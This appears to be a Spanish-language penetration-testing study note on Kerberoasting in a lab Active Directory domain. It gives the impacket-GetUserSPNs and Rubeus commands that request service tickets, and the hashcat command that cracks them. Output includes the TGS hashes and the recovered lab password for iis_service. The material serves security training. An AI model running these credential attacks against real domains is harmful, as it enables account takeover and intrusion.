Igual que AS-REP Roasting, podemos ejecutar el ataque desde nuestro linux si disponemos de credenciales de nuestro usuario o algún usuario del dominio, de no ser así podemos ejecutar el ataque desde el equipo windows víctima.
NUESTRO LINUX
Usamos el módulo de impacket-GetUserSPNs, le indicamos IP del DC y al final dominio y usuario, posteriormente ponemos la contraseña.
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 172.16.48.6 relia.com/jim
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec...
Esto no mostrará el hash y podemos crackearlo con el módulo 13100 de hashcat
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1ea44b147384afb551723719a6d3b960adf6b2ce4e2741f7d0ec27a87c4c8bb4e5b1bb455714d3dd52c16a4e4c242df94897994ec0087cf5cfb16c2cb64439d514241eec
...
a96a7e6e29aa173b401935f8f3a476cdbcca8f132e6cc8349dcc88fcd26854e334a2856c009bc76e4e24372c4db4d7f41a8be56e1b6a912c44dd259052299bac30de6a8d64f179caaa2b7ee87d5612cd5a4bb9f050ba565aa97941ccfd634b:Strawberry1
WINDOWS VÍCTIMA
Igual que AS-REP roast, con rubeus
PS C:\\Tools> .\\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \\ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \\| ___ | | | |/___)
| | \\ \\| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\\Tools\\hashes.kerberoast
Nos almacena el hash en un archivo “hashes.kerberoast” y lo crackeamos con hashcat con el módulo 13100
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$corp.com$HTTP/web04.corp.com:[email protected]*$940ad9dcf5dd5cd8e91a86d4ba0396db$f57066a4f4f8ff5d70df39b0c98ed7948a5db08d689b92446e600b49fd502dea39a8ed3b0b766e5cd40410464263557bc0e4025bfb92d89ba5c12c26c72232905dec4d060d3c8988945419ab4a7e7adec407d22bf6871d
...
d8a2033fc64622eaef566f4740659d2e520b17bd383a47da74b54048397a4aaf06093b95322ddb81ce63694e0d1a8fa974f4df071c461b65cbb3dbcaec65478798bc909bc94:Strawberry1